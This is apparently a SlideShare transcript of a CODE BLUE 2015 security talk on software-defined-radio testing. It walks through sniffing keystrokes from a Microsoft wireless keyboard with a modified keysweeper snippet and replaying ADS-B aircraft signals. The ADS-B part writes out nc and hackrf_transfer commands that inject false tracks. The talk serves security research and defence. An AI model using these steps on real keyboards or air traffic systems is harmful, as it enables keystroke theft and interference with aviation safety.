SlideShare a Scribd company logo
1 of 57
Keiichi Horiai
Fujitsu System Integration LABs.
CODE BLUE 2015
Wireless security
testing with attack
Agenda
 Circumstance
 In the IoT (Internet of Things) era
• key : Wireless Security
• To analyze wireless security,
SDR ( Software Defined Radio) technology is
effective.
 Introduce GNU Radio, a SDR tool
 Powerful tool to test wireless security
 Easily available, work with inexpensive peripheral
hardware
 Wireless security testing with attack
 Attack#1 Key logging wireless keyboard
 Attack#2 The replay attack for ADS-B2
Recent release of wireless security
 Abuse/Falsification of software and firmware
 Drone attack by malware and network
• http://www.slideshare.net/codeblue_jp/cb14-dongcheol-hongja/
 RF signal level interception/injection
 SPREAD SPECTRUM SATCOM HACKING: ATTACKING THE
GLOBALSTAR SIMPLEX DATA SERVICE
• https://www.blackhat.com/docs/us-15/materials/us-15-Moore-
Spread-Spectrum-Satcom-Hacking-Attacking-The-GlobalStar-
Simplex-Data-Service.pdf
 Low-cost GPS simulator – GPS spoofing by SDR
• Lin Huang, Qing Yang, DEFCON23
• https://media.defcon.org/DEF%20CON%2023/DEF%20CON
%2023%20presentations/Lin%20Huang%20&%20Qing
%20Yang/DEFCON-23-Lin-Huang-Qing-Yang-GPS-Spoofing.pdf  
3
 In 2001, Eric Blossom in US started a free & open-source
software development toolkit about radio.
 Multi-platform (Linux/FreeBSD/OSX/Windows)
 Run on personal computer. cf. Many software radio
technology run on FPGA on exclusive hardware.
 Create flow graph to use GUI on GNURadio Companion
 flow graph -> XML file -> Python -> C++
 License GPL ver3
http://gnuradio.org/redmine/projects/gnuradio/wiki
About GNURadio
4
GNURadio Component
 Elements of the flow graph
SOURCE BLOCK SINK
Software
or
Hardware
Software
  Python
C++
Software
or
Hardware
Input OutputProcessing
5
Sources
 Software
Waveform generation (Sin, Cos, Triangle,
Sawtooth, Square )
Various noise
File
 Hardware
PC Audio
Other peripheral hardware
•RTL-SDR, HackRF, BladeRF, USRP
6
Blocks
 Operator(Logical, Bytes, Integer, Real, Complex...)
 Constant, Variable(slider), Type conversion
 Calculation (add, sub, multiple, div, Log, RMS, integral...)
 Filter(LowPass, HighPass, BandPass, Reject, FFT, Hilbert,
IIR, Decimation...)
 Modulation and demodulation ( AM, FM, FSK, PSK, QAM,
OFDM…)
 Level control (AGC, Mute, Squelch, Moving average...)
 Network (TCP, UDP, Socket...)
 and more
7
Sinks
 Software
 Hardware
 PC Audio
 Other peripheral hardware
• HackRF, BladeRF, USRP, ... etc.
SCOPE FFT Water Fall
Histogram Constellation Plot
Other Files
8
Peripheral hardware (e.g.)
  RTL-SDR HackRF BladeRF USRP
Frequency
range [MHz] 24-1800 1-6000 300-3800 70-6000
A/D convert
bits 8 8 12 12
Band range
[MHz] 2.8 20 28 56
Transfer /
Receive RX Tx | Rx Tx & Rx Tx & Rx
Price $20 $300 $420 $675
9
FlowGraph (e.g.)
Available
tools
10
VHF receiver
 A VHF receiver composed of RTL-SDR and GNU Radio
RTL-SDR
11
ISM 2.4GHz band
 WiFi/Bluetooth frequency allocation
http://www.digikey.com/es/articles/techzone/2013/jun/shaping-the-wireless-future-with-low-energy-applications-and-systems
12
ISM 2.4GHz band monitoring (e.g.)
HackRF
13
Attack wireless devices
 Survey attack target
Search FCC ID in FCC site
Photos, someone else put on view?
Overhaul by myself
 Necessary information
RF chip data sheet
•Frequency band, Modulation, Transmission
speed, Data format
 Observe and analyze the signal
14
FCC ID Search
https://apps.fcc.gov/oetcf/eas/reports/ViewExhibitReport.cfm?mode=Exhibits&RequestTimeout=500&calledFromFrame=N&application_id=Al
%2FFPgcInlgHLjNZvXbPTQ%3D%3D&fcc_id=A6O60001058RX
15
How to monitoring and analyzing the signal
 Receive radio waves
 Check the signal : GNU Radio, SDR#
 Write the received signal to file : GNU Radio, rtl_sdr
 Analyze
 Monitoring the waveform in detail : baudline
 Cut the area where you need ( The area selected and
write to file ) : baudline
 Demodulation: GNU Radio | in-house scripts
 Decode / Parse / Decrypt
• Convert to bits (0/1) ( Hex dump is unreadable )
• Find the characterized bit pattern
16
Signal monitoring tool
 Baudline
Baudline is the signal time-frequency
visualization and analysis support tool
Requirements
• Linux(x86_64,PowerPC)
• Mac OS X
• Solaris SPARC
Select the area
and write to file
http://www.baudline.com/index.html17
Monitoring the signal (e.g.)
18
Attack demo #1
 Keylogger for Microsoft wireless keyboard 800
At first, try to reproduce “keysweeper”(*1)
It can’t work the MS Wireless Keyboard 800
Japanese edition
Demonstrate process from investigate the
cause using the GNU Radio to work
(*1) https://github.com/samyk/keysweeper
19
Keylogger for Wireless Keyboard
 27MH z band
It is easy to snoop because (in)secure
End of sale in the 2000s
 2.4GHz band
Same as Bluetooth/WiFi frequency
Bluetooth specification is secure?
What about the proprietary specification
keyboard?
20
Relation Project
 Travis Goodspeed, 2010
 The GoodFET is an open-source JTAG adapter, loosely based
upon the TI MSP430 FET UIF and EZ430U boards
 http://goodfet.sourceforge.net/
 KeyKeriKi Project (CanSecWest 2010)
 Developed some device with ARM Cortex MPU and radio module
which can keyboard sniffing and remote command execution.
 http://www.remote-exploit.org/articles/keykeriki_v2_0__8211_2_4ghz/index.html
 Keysweeper (January 2015)
 Make efficient and systematize processes
• Focus on a part of device address fixed 0xCD
• Embedded in USB charger and logging to EEPROM
• Detect keyword and mobile module send SMS
• Forward keystroke to another device in real time ... etc.
 https://github.com/samyk/keysweeper
21
Experiment on breadboard
Sniffer hardware
USB
control PC
Microsoft Wireless
Keyboard 800 Arduino nano
•Scan 2403-2480MHz by 1MHz step
•Inspect 1 byte (=0xCD) in device ID
•If next 2byte are (0x0A38 | 0x0A78),
stop scanning and start logging
about 1500 lines Arduino program
nRF24L01
・ 2.4GHz ISM band
・ GFSK modulation
・ 1Mbps or 2Mbps
22
Success ?
Radio setup
End radio setup
scan
Tuning to 2480
Potential keyboard: AA AA 5A A9 CD 27 55 49
Tuning to 2403
Tuning to 2404
Potential keyboard: E4 AA AA A5 CD 55 A5 5A
Tuning to 2405
Tuning to 2406
Tuning to 2407
Tuning to 2408
…………………
No !!
23
Wireless keyboard wave form
24
Baudline (cut the area)
25
Demodulation
- 50
- 40
- 30
- 20
- 10
0
10
20
30
40
50
1 51 101 151 201 251 301
- 50
- 40
- 30
- 20
- 10
0
10
20
30
40
50
1 51 101 151 201 251 301
I/Q
Vfm
Vfm = ( I ( dQ/dt) - Q ( dI/dt)) / (I ^2 + Q^2)
preamble
bit = Vfm > 0 ? 0:1bit
26
Get BIT sequence
bit = Vfm > 0 ? 0:1
111111111111001100010000000000100110111110111111111111111111111111
111111111110010101010101010010011001111100101000101101100111001000
000000001010011110000001110100000001010011100001110110100110001100
111010100111101110000010001110010100110011100111001110011100011110
111110100111000111111111111100110010000000000001111111011111111111
111101111111101111111111111111111111111111111001010101010101001001
100111110010100010110110011100100000000000101001111000000111010000
000101001110000111011010011000110011101010011110111000001000111001
010011001110101001110011100111000111101111101001110101111111111100
110000001000100010001111111111111111111111111011111111111111111111
101010101001011001111100101000101101100111001000000000001010011110
000001110100000001010011100001110110100110001100111010100111101110
000010001110
……….
27
nRF24L01 Packet format
 Preamble
 0xAA | 0x55
 Address
 3-5 Byte
 PCF
 9 bit
 Payload
 0- 32Byte
 CRC
 1-2 byte http://www.nordicsemi.com/eng/Products/2.4GHz-RF/nRF24L01
28
KeyKeriki Project results
・ Microsoft   Wireless Keyboard 800’s device address is composed
of 5 byte start from 0xCD
・ Keystroke is encrypted by simple XOR operation using this device
address
http://www.remote-exploit.org/content/keykeriki_v2_cansec_v1.1.pdf
29
Get BIT sequence
bit = Vfm > 0 ? 0:1
111111111111001100010000000000100110111110111111111111111111111111
111111111110010101010101010010011001111100101000101101100111001000
000000001010011110000001110100000001010011100001110110100110001100
111010100111101110000010001110010100110011100111001110011100011110
111110100111000111111111111100110010000000000001111111011111111111
111101111111101111111111111111111111111111111001010101010101001001
100111110010100010110110011100100000000000101001111000000111010000
000101001110000111011010011000110011101010011110111000001000111001
010011001110101001110011100111000111101111101001110101111111111100
110000001000100010001111111111111111111111111011111111111111111111
101010101001011001111100101000101101100111001000000000001010011110
000001110100000001010011100001110110100110001100111010100111101110
000010001110
……….
find to “0x0A78 (0000101001111000)”
Packet control field 9 bit
Devie ID
Preamble 8bit + address 5 byte + packet control 9bit + payload
30
Device ID detection
{ P.A. } { [p0] p[1] [p2] [p3] [p4]}
AA A9 33 E5 16 CE
10101010 10101001   00110011   11100101   00010110  
11001110
{PktCTL Bit} 0A 78 1D 01
010000000 00001010 01111000 00011101 00000001
{ payload .......
0100111000011101101001100011001110101001111011100……
// From keysweeper_mcu_src   https://github.com/samyk/keysweeper
if (radio.available())
{
radio.read(&p, PKT_SIZE);
if (p[4] == 0xCD) // 0xCD -> 0xCE for Japanese KBD
{
sp("Potential keyboard: ");
DEVICE ID
31
Behavior after (0xCD->0xCE)
{………………}
Tuning to 2479
Tuning to 2480
Potential keyboard: A9 33 E5 16 CE 43 5 3C
KEYBOARD FOUND! Locking in on channel 80
2setupRadio
16: 0A 78 1D 01 56 03 43 00 00 1E 00 00 00 00 00 8F <- Key 1 Press
> 1
8: 0A 38 1D 01 56 03 00 84
16: 0A 78 1D 01 57 03 43 00 00 00 00 00 00 00 00 90 <- Key OFF
16: 0A 78 1D 01 58 03 43 00 00 1F 00 00 00 00 00 80 <- Key 2 Press
> 2
8: 0A 38 1D 01 58 03 00 8A
{………………}
(*1) USB HID usage table: http://www.freebsddiary.org/APC/usb_hid_usages.php
(*1)
32
Key Logger DEMO
33
Summary #1
 Using GNU Radio, find the device address KEY
(0xCE) of the Microsoft Wireless Keyboard 800
Japanese edition
 Change the device address KEY to 0xCE, then
monitor keylogger Behavior.
 Don’t use wireless keyboard, when the operation
with sensitive information. Especially, warn against
using proprietary specification device.
Caution
 Experiment in Japan, signal from nRF24L should be invalidated
• boolean shoutKeystrokes = true; -> false;
34
Attack demo #2
 Replay attack for ADS-B(*1) mounted on
aircraft
Aviation is part of the critical infrastructure
ADS-B is next generation air traffic control
system
Attack demo played in Blackhat2012,
DEFCON20, ...etc.
Applying SDR technology, tried to replay
the attack
(*1)Automatic Dependent Surveillance–Broadcast
35
Congestion in the Skies
http://www.flightradar24.com/
36
ADS-B overview
 Because old radar’s positional accuracy was 1-2 NM, there was a need
to widen the service interval to ensure the safety of aircraft operation.
 To keep up with aircraft increasing, new system is needed. ADS-B,
using GPS, to provide a highly accurate position information, has been
developed as next generation air traffic control system in 1980-1990.
 Now, about 70 % of passenger plane have ADS-B
   (Source http://www.flightradar24.com/how-it-works)
 Required to equip until 2017 in Europe, until 2020 in the United States
 Point at issue
 No encryption
 Broadcast with no authentication
 Simple encoding and simple modulation scheme
37
Mechanism of ADS-B
 ADS-B
Automatic Dependent Surveillance–Broadcast
Using broadcast datalink, Aircraft transmits own
location, speed, altitude, and so on obtained
from measuring system such as GPS.
Image   http://www.enri.go.jp/news/osirase/pdf/e_navi10.pdf
38
GPS location
Broadcast
Datalink
Control Center Ground Receiving
Station
Papers related to ADS-B
 About Vulnerability
 Donald L. McCallie, Major, USAF   (2011)
• http://apps.fcc.gov/ecfs/document/view.action?id=7021694523
 Andrei Costin, Aurelien Francillon, BlackHat2012
• https://media.blackhat.com/bh-us-
12/Briefings/Costin/BH_US_12_Costin_Ghosts_In_Air_Slides.pdf
 Brad render, DEFCON20  ( 2012 )
• http://korben.info/wp-content/uploads/defcon/SpeakerPresentations/Renderman/DEFCON-20-
RenderMan-Hackers-plus-Airplanes.pdf
 Hugo Teso, CyCon2013 (2013)
• https://ccdcoe.org/cycon-2013.html
 About Countermeasures
 Martin Strohmeier, Ivan Martinovic 、 (2014)
• Detecting False-Data Injection Attacks on Air Traffic Control Protocols
• http://www.cs.ox.ac.uk/files/6604/wisec2014-abstract.pdf
 Kyle D. Wesson,Brian L. Evans, and more. (2014)
• Can Cryptography Secure Next Generation Air Traffic Surveillance?
• https://radionavlab.ae.utexas.edu/images/stories/files/papers/adsb_for_submission.pdf
 Seoung-Hyeon Lee , Yong-Kyun Kim, Deok-Gyu Lee, and more. (2014)
• Protection Method for Data Communication between ADS-BSensor and Next-Generation Air
Traffic Control Systems
• http://www.mdpi.com/2078-2489/5/4/622
39
Expected threats
Snoop (Eavesdropping)
Jamming
Fake aircraft’s wake injection
(Fake track injection)
40
How to receive ADS-B?
 Receive the radio waves
USB stick for receiving overseas digital TV
It’s about 1000 JPY to 2000 JPY
 Process the signal
and display
PC
•Windows, Mac, Linux
Smartphone, Tablet
41
ADS-B receiver software
 Decoder
 ADSB# http://airspy.com/index.php/downloads/
 RTL1090 http://rtl1090.web99.de/
 Modesdeco2 (w/ display function)
• http://radarspotting.com/forum/index.php/topic,2978.msg13471.html
 dump1090 (w/ display function)
• https://github.com/antirez/dump1090
 Display
 Virtual Radar Server http://www.virtualradarserver.co.uk/
 adsbSCOPE
• http://www.sprut.de/electronic/pic/projekte/adsb/adsb_en.html#downloads
 PlanePlotter http://www.coaa.co.uk/planeplotter.htm
42
Receivable area
Antenna
43
ADS-B format
 Format
 Actual received I/Q signals
https://media.defcon.org/DEF%20CON%2020/DEF%20CON%2020%20slides/DEF%20CON%2020%20Hacking%20Conference
%20Presentation%20By%20RenderMan%20-%20Hacker%20and%20Airplanes%20No%20Good%20Can%20Come%20Of%20This
%20-%20Slides.m4v
44
Waveform monitoring with GNU Radio
(I2
+ Q2
)I/Q
45
Received ADS-B (e.g.)
*8d7583a5585b575a9ebc4bbb3f04;
CRC: 000000 (ok)
DF 17: ADS-B message.
Capability : 5 (Level 2+3+4 )
ICAO Address : 7583a5
Extended Squitter Type: 11
Extended Squitter Sub : 0
Extended Squitter Name: Airborne Position …….
F flag : odd
T flag : non-UTC
Altitude : 17125 feet
………….
Raw data in hex
Aircraft
location data,
...etc.
I/Q signal after A/D convert
Demodulation / Decode
Parse the data
46
Attack Vector
IP NetworkIP Network
ADS-B
Receiving
Station
ADS-B
Receiving
Station
ADS-B
Receiving
Station
ADS-B
Broadcast
GPS Satellite
Actor V2
V3
Image http://www.mlit.go.jp/koku/koku_fr14_000007.html
V1
47
Replay Attack (V1)
 Intercepted raw data ( File name: xxxx.raw)
 Inject the raw data via IP network
$cat xxxx.raw | nc target_IP target_PORT
※In reality, the adversary needs to find a way to get through the
authentication in order to connect to the target server.
*8d869210581fe3bf4350dfd62439;
*5da40455385715;
*8d86dca29914ee0f20f410ef2595;
*8d780c3c581db79c18a4b0ffc872;
*8d867f609914b993e8700ba91251;
*02a1839b9e229d;
*……………
48
Replay Attack (V2)
 Create an ADS-B pulse signal file from the raw data
 $cat xxxx.raw | ./adsb-pulsegen test_file.bin
 Use the file to generate a RF signal modulated
 $hackrf_transfer –f 1090MHz –s 2MHz –t test_file.bin –x 0
*8d869210581fe3bf4350dfd62439;
*5da40455385715;
*8d86dca29914ee0f20f410ef2595;
*8d780c3c581db79c18a4b0ffc872;
*8d867f609914b993e8700ba91251;
*02a1839b9e229d;
*0261819c1d1e5a;
……………
49
DEMO
 Injection via IP network (V1)
Real-time interception of ADS-B signal and
display on map
Inject the raw data received in the past
 Injection via RF channel (V2)
Generate an I/Q signal file from the received raw
data
Inject the RF signal modulated by the I/Q signal
50
ADS-B network injection
http://www.flightradar24.com/
Network injection demo Screen shot
51
ADS-B RF injection
RF injection demo screen shot
52
Security of air traffic control?
 Why doesn’t it get renewed?
 Threat not being recognized
 To preserve safety and
interoperability
 International discussion
takes a long period of time
• Forming consensus
• Development
• Deployment
Image http://www.jatcaonline.com/SSR_system.JPG
https://upload.wikimedia.org/wikipedia/commons/f/fe/D-VOR_PEK.JPG
ASR/SSR
ILS ( glide slope / Localizer )
VOR/DME
53
Summary #2
 Technically, an attack against ADS-B is extremely easy
 Not only ADS-B but any air traffic control system that relies on radio
waves are vulnerable to jamming attacks.
 Possible attack scenarios
 Terrorists or nation state actors injects false flight paths or performs
jamming attacks to confuse the air traffic control as one of the ways to
accomplish an objective.
 Is it hard to implement early countermeasures? ( Requires an
international consensus )
 A mitigation plan such as detecting interception or using tracking
algorithms must be considered
 Create an environment that enhances virtual trainings and incident
response plan
54
Conclusion
 Due to the emerge of the software defined radio experiment
tool GNU Radio and the low cost RF related hardware, the
technical threshold to carry out an RF attack has been
lowered
 The existing systems that relies on radio waves such as the
air traffic control system, has not been able to follow the
modernization which the commercial technology like WIFI or
smartphone has gone through
 A fundamental countermeasure will require a long period of
time
 Compensating the lack of countermeasure with operational
practice will require an enhanced incident response plan and
trainings
55
Thank you !
Questions ?
56
57 Copyright 2010 FUJITSU LIMITED

More Related Content

What's hot

Wireless Local Area Networks
Wireless Local Area NetworksWireless Local Area Networks
Wireless Local Area NetworksDilum Bandara
 
BAIT1103 Chapter 6
BAIT1103 Chapter 6BAIT1103 Chapter 6
BAIT1103 Chapter 6limsh
 
Bluetooth and Raspberry Pi
Bluetooth and Raspberry PiBluetooth and Raspberry Pi
Bluetooth and Raspberry PiDamien Magoni
 
MOS Devices and Modeling (1).pptx
MOS Devices and Modeling (1).pptxMOS Devices and Modeling (1).pptx
MOS Devices and Modeling (1).pptxmohan134666
 
2portnetwork-150303092056-conversion-gate01
2portnetwork-150303092056-conversion-gate012portnetwork-150303092056-conversion-gate01
2portnetwork-150303092056-conversion-gate01brijeshtimaniya
 
iSCSI Protocol and Functionality
iSCSI Protocol and FunctionalityiSCSI Protocol and Functionality
iSCSI Protocol and FunctionalityLexumo
 
Mobility Management in Wireless Communication
Mobility Management in Wireless CommunicationMobility Management in Wireless Communication
Mobility Management in Wireless CommunicationDon Norwood
 
Modules and ports in Verilog HDL
Modules and ports in Verilog HDLModules and ports in Verilog HDL
Modules and ports in Verilog HDLanand hd
 
Verilog overview
Verilog overviewVerilog overview
Verilog overviewposdege
 
Data encryption standard (des)
Data encryption standard  (des)Data encryption standard  (des)
Data encryption standard (des)Mecheko Sha
 
BGP FlowSpec experience and future developments
BGP FlowSpec experience and future developmentsBGP FlowSpec experience and future developments
BGP FlowSpec experience and future developmentsPavel Odintsov
 
Router Full Concept pdf
Router Full Concept pdf Router Full Concept pdf
Router Full Concept pdf Vignesh kumar
 
Nodemcu - introduction
Nodemcu - introductionNodemcu - introduction
Nodemcu - introductionMichal Sedlak
 

What's hot (20)

Serializer
SerializerSerializer
Serializer
 
Wireless Local Area Networks
Wireless Local Area NetworksWireless Local Area Networks
Wireless Local Area Networks
 
Ns2
Ns2Ns2
Ns2
 
BAIT1103 Chapter 6
BAIT1103 Chapter 6BAIT1103 Chapter 6
BAIT1103 Chapter 6
 
Bluetooth and Raspberry Pi
Bluetooth and Raspberry PiBluetooth and Raspberry Pi
Bluetooth and Raspberry Pi
 
MOS Devices and Modeling (1).pptx
MOS Devices and Modeling (1).pptxMOS Devices and Modeling (1).pptx
MOS Devices and Modeling (1).pptx
 
Mtcna
MtcnaMtcna
Mtcna
 
2portnetwork-150303092056-conversion-gate01
2portnetwork-150303092056-conversion-gate012portnetwork-150303092056-conversion-gate01
2portnetwork-150303092056-conversion-gate01
 
iSCSI Protocol and Functionality
iSCSI Protocol and FunctionalityiSCSI Protocol and Functionality
iSCSI Protocol and Functionality
 
Mobility Management in Wireless Communication
Mobility Management in Wireless CommunicationMobility Management in Wireless Communication
Mobility Management in Wireless Communication
 
Modules and ports in Verilog HDL
Modules and ports in Verilog HDLModules and ports in Verilog HDL
Modules and ports in Verilog HDL
 
Verilog overview
Verilog overviewVerilog overview
Verilog overview
 
Data encryption standard (des)
Data encryption standard  (des)Data encryption standard  (des)
Data encryption standard (des)
 
Routing Protocols in WSN
Routing Protocols in WSNRouting Protocols in WSN
Routing Protocols in WSN
 
VLSI VHDL
VLSI VHDLVLSI VHDL
VLSI VHDL
 
BGP FlowSpec experience and future developments
BGP FlowSpec experience and future developmentsBGP FlowSpec experience and future developments
BGP FlowSpec experience and future developments
 
Ccna labs
Ccna labsCcna labs
Ccna labs
 
Router Full Concept pdf
Router Full Concept pdf Router Full Concept pdf
Router Full Concept pdf
 
1. Coordinated Multi-Point Transmission in 5G.pptx
1. Coordinated Multi-Point Transmission in 5G.pptx1. Coordinated Multi-Point Transmission in 5G.pptx
1. Coordinated Multi-Point Transmission in 5G.pptx
 
Nodemcu - introduction
Nodemcu - introductionNodemcu - introduction
Nodemcu - introduction
 

Similar to Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015

IoT LPWAN network security: Sigfox and LoRaWAN (Mikael Falkvidd @ Knowit secu...
IoT LPWAN network security: Sigfox and LoRaWAN (Mikael Falkvidd @ Knowit secu...IoT LPWAN network security: Sigfox and LoRaWAN (Mikael Falkvidd @ Knowit secu...
IoT LPWAN network security: Sigfox and LoRaWAN (Mikael Falkvidd @ Knowit secu...Mikael Falkvidd
 
2018 all lens bag of tricks v1.2
2018 all lens bag of tricks v1.22018 all lens bag of tricks v1.2
2018 all lens bag of tricks v1.2Len Noe
 
Hardware Hacking Chronicles: IoT Hacking for Offence and Defence
Hardware Hacking Chronicles: IoT Hacking for Offence and DefenceHardware Hacking Chronicles: IoT Hacking for Offence and Defence
Hardware Hacking Chronicles: IoT Hacking for Offence and DefenceFatih Ozavci
 
microcontrollersstm32wlseriesproductwebinarpresentation1625231766205.pdf
microcontrollersstm32wlseriesproductwebinarpresentation1625231766205.pdfmicrocontrollersstm32wlseriesproductwebinarpresentation1625231766205.pdf
microcontrollersstm32wlseriesproductwebinarpresentation1625231766205.pdfadfadfadf
 
War Field Spying Robot with Fire Fighting Alarm.
War Field Spying Robot with Fire Fighting Alarm.War Field Spying Robot with Fire Fighting Alarm.
War Field Spying Robot with Fire Fighting Alarm.vansh_raheja
 
Exfiltrating Data through IoT
Exfiltrating Data through IoTExfiltrating Data through IoT
Exfiltrating Data through IoTPriyanka Aash
 
FPGA_prototyping proccesing with conclusion
FPGA_prototyping proccesing with conclusionFPGA_prototyping proccesing with conclusion
FPGA_prototyping proccesing with conclusionPersiPersi1
 
RFID Security Module
RFID Security ModuleRFID Security Module
RFID Security Modulecgvwzq
 
cisco-air-cap3702i-r-k9-datasheet.pdf
cisco-air-cap3702i-r-k9-datasheet.pdfcisco-air-cap3702i-r-k9-datasheet.pdf
cisco-air-cap3702i-r-k9-datasheet.pdfHi-Network.com
 
It’s in the Air(waves): Deconstructing 2017’s Biggest RF Attacks
It’s in the Air(waves): Deconstructing 2017’s Biggest RF AttacksIt’s in the Air(waves): Deconstructing 2017’s Biggest RF Attacks
It’s in the Air(waves): Deconstructing 2017’s Biggest RF AttacksPriyanka Aash
 
cisco-air-cap3702i-i-k9-datasheet.pdf
cisco-air-cap3702i-i-k9-datasheet.pdfcisco-air-cap3702i-i-k9-datasheet.pdf
cisco-air-cap3702i-i-k9-datasheet.pdfHi-Network.com
 
Hacking RF based IoT devices
Hacking RF based IoT devicesHacking RF based IoT devices
Hacking RF based IoT devicesErez Metula
 
LTE protocol exploits – IMSI catchers, blocking devices and location leaks - ...
LTE protocol exploits – IMSI catchers, blocking devices and location leaks - ...LTE protocol exploits – IMSI catchers, blocking devices and location leaks - ...
LTE protocol exploits – IMSI catchers, blocking devices and location leaks - ...EC-Council
 
cisco-air-cap3702i-c-k9-datasheet.pdf
cisco-air-cap3702i-c-k9-datasheet.pdfcisco-air-cap3702i-c-k9-datasheet.pdf
cisco-air-cap3702i-c-k9-datasheet.pdfHi-Network.com
 
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdfNXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdfssuser57b3e5
 
cisco-air-cap3702i-n-k9-datasheet.pdf
cisco-air-cap3702i-n-k9-datasheet.pdfcisco-air-cap3702i-n-k9-datasheet.pdf
cisco-air-cap3702i-n-k9-datasheet.pdfHi-Network.com
 

Similar to Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015 (20)

IoT LPWAN network security: Sigfox and LoRaWAN (Mikael Falkvidd @ Knowit secu...
IoT LPWAN network security: Sigfox and LoRaWAN (Mikael Falkvidd @ Knowit secu...IoT LPWAN network security: Sigfox and LoRaWAN (Mikael Falkvidd @ Knowit secu...
IoT LPWAN network security: Sigfox and LoRaWAN (Mikael Falkvidd @ Knowit secu...
 
2018 all lens bag of tricks v1.2
2018 all lens bag of tricks v1.22018 all lens bag of tricks v1.2
2018 all lens bag of tricks v1.2
 
Hardware Hacking Chronicles: IoT Hacking for Offence and Defence
Hardware Hacking Chronicles: IoT Hacking for Offence and DefenceHardware Hacking Chronicles: IoT Hacking for Offence and Defence
Hardware Hacking Chronicles: IoT Hacking for Offence and Defence
 
microcontrollersstm32wlseriesproductwebinarpresentation1625231766205.pdf
microcontrollersstm32wlseriesproductwebinarpresentation1625231766205.pdfmicrocontrollersstm32wlseriesproductwebinarpresentation1625231766205.pdf
microcontrollersstm32wlseriesproductwebinarpresentation1625231766205.pdf
 
War Field Spying Robot with Fire Fighting Alarm.
War Field Spying Robot with Fire Fighting Alarm.War Field Spying Robot with Fire Fighting Alarm.
War Field Spying Robot with Fire Fighting Alarm.
 
Exfiltrating Data through IoT
Exfiltrating Data through IoTExfiltrating Data through IoT
Exfiltrating Data through IoT
 
FPGA_prototyping proccesing with conclusion
FPGA_prototyping proccesing with conclusionFPGA_prototyping proccesing with conclusion
FPGA_prototyping proccesing with conclusion
 
RFID Security Module
RFID Security ModuleRFID Security Module
RFID Security Module
 
cisco-air-cap3702i-r-k9-datasheet.pdf
cisco-air-cap3702i-r-k9-datasheet.pdfcisco-air-cap3702i-r-k9-datasheet.pdf
cisco-air-cap3702i-r-k9-datasheet.pdf
 
It’s in the Air(waves): Deconstructing 2017’s Biggest RF Attacks
It’s in the Air(waves): Deconstructing 2017’s Biggest RF AttacksIt’s in the Air(waves): Deconstructing 2017’s Biggest RF Attacks
It’s in the Air(waves): Deconstructing 2017’s Biggest RF Attacks
 
cisco-air-cap3702i-i-k9-datasheet.pdf
cisco-air-cap3702i-i-k9-datasheet.pdfcisco-air-cap3702i-i-k9-datasheet.pdf
cisco-air-cap3702i-i-k9-datasheet.pdf
 
Hacking RF based IoT devices
Hacking RF based IoT devicesHacking RF based IoT devices
Hacking RF based IoT devices
 
Bluetooth
BluetoothBluetooth
Bluetooth
 
09
0909
09
 
LTE protocol exploits – IMSI catchers, blocking devices and location leaks - ...
LTE protocol exploits – IMSI catchers, blocking devices and location leaks - ...LTE protocol exploits – IMSI catchers, blocking devices and location leaks - ...
LTE protocol exploits – IMSI catchers, blocking devices and location leaks - ...
 
SDS_SSL_MPM_UN_A4
SDS_SSL_MPM_UN_A4SDS_SSL_MPM_UN_A4
SDS_SSL_MPM_UN_A4
 
cisco-air-cap3702i-c-k9-datasheet.pdf
cisco-air-cap3702i-c-k9-datasheet.pdfcisco-air-cap3702i-c-k9-datasheet.pdf
cisco-air-cap3702i-c-k9-datasheet.pdf
 
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdfNXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
 
cisco-air-cap3702i-n-k9-datasheet.pdf
cisco-air-cap3702i-n-k9-datasheet.pdfcisco-air-cap3702i-n-k9-datasheet.pdf
cisco-air-cap3702i-n-k9-datasheet.pdf
 
Sahil_Resume
Sahil_ResumeSahil_Resume
Sahil_Resume
 

More from CODE BLUE

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...CODE BLUE
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten NohlCODE BLUE
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
